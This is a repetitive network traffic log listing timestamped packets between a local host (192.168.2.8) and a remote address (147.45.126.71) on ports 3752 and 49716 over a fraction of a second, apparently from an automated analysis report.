Oct 8, 2024 20:52:31.132462025 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.132474899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.132488966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.132488966 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.132502079 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.132510900 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.132518053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.132580042 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.132695913 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.132946968 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.134134054 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.134149075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.134160995 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.134541035 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.135649920 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.135663033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.135678053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.135772943 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.135814905 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.137352943 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.137413979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.137476921 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.137718916 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.137731075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.139440060 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.140621901 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.140712976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.140726089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.142554998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.142579079 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.142594099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.142679930 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.142679930 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.143832922 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.143867016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.143878937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.143914938 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.144974947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.145049095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.145062923 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.145091057 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.145092010 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.147598028 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.147624969 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.147639036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.147711992 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.149974108 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.150002956 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.150017023 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.150104046 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.150137901 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.151268005 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.151326895 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.151340961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.153132915 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.153151989 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.153167009 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.155416012 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.157680988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.157798052 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.157820940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.157835960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.157850027 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.157850981 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.158082008 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.159580946 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.159616947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.159630060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.159707069 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.161326885 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.161407948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.161422968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.162786961 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.163810968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.163837910 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.163850069 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.163880110 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.163880110 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.164135933 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.164181948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.164194107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.164274931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.165241003 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.165241003 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.166292906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.166351080 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.166364908 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.166409016 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.166431904 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.166702032 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.168334007 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.168392897 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.168406010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.168535948 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.169997931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.170073032 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.170089006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.170222044 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.170222044 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.171345949 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.171435118 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.171447992 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.171818018 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.172565937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.172621012 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.172632933 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.172653913 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.172692060 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.174190044 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.174215078 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.174226999 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.174279928 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.175681114 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.175712109 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.175723076 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.175839901 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.175841093 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.177324057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.177335978 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.177447081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.177510023 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.177751064 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.179248095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.179260969 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.179272890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.179303885 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.183696985 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.183746099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.183762074 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.183768988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.183784962 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.183799028 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.183878899 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.183878899 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.186583996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.186608076 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.186625957 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.187417030 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.187856913 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.187870026 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.187880039 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.187977076 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.194025993 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.194047928 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.194060087 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.194557905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.194570065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.194581032 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.194608927 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.196371078 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.196392059 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.196403027 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.197626114 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.197626114 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.198050976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.198064089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.198076010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.198107004 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.199769020 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.199786901 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.199799061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.201404095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.201442003 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.201456070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.202848911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.202884912 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.202897072 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.204539061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.204579115 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.204590082 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.205718994 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.205729961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.205740929 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.207592010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.207603931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.207614899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.208484888 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.208707094 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.208724976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.208736897 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.209750891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.209763050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.209773064 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.213170052 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.213170052 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.214044094 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.214063883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.214076042 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.214087009 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.214097023 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.214129925 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.214129925 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.214720964 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.220308065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.220330000 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.220340967 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.220352888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.220465899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.220503092 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.220515013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.220808029 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.222363949 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.222383022 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.222393990 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.222407103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.222436905 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.222486019 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.222507000 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.222529888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.222609043 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.229213953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.229300976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.229314089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.229396105 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.229408026 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.229418993 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.229429960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.229441881 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.229459047 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.229459047 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.229459047 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.229669094 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.231667042 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.231688023 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.231698990 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.231739044 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.231750011 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.231770992 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.231770992 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.231776953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.231790066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.231801033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.231823921 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.232475996 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.262238979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.267249107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.267271042 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.267283916 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.267309904 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.267322063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.267332077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.267489910 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.267529011 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.267646074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.267656088 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.270711899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.270752907 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.270761967 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.270837069 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.270978928 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.270992041 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.276953936 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.277025938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.277036905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.277048111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.277060032 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.277070999 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.277081013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.277093887 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.277736902 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.280385017 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.293782949 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.293782949 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.294264078 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.299639940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.299653053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.299664021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.300926924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.300988913 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.300990105 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.300998926 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.301007986 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.301048994 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.301140070 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.301542997 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.301561117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.301645994 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.301702023 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.301712036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.301821947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.301834106 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.302056074 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.302213907 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.302789927 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.302800894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.302812099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.302898884 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.303244114 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.303265095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.303406954 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.303914070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.303926945 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.303941011 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.303956985 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.303971052 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.303985119 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.304003000 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.304061890 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.304502964 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.304517031 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.304531097 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.304549932 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.304641962 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.304650068 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.304653883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.304770947 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.339979887 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.339994907 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340050936 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340153933 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340271950 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340342045 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340356112 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340378046 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340442896 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340508938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340548038 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340595961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340727091 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340740919 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340754986 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340862036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340950012 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.340962887 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.341121912 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.341135025 CEST	3752	49716	147.45.126.71	192.168.2.8
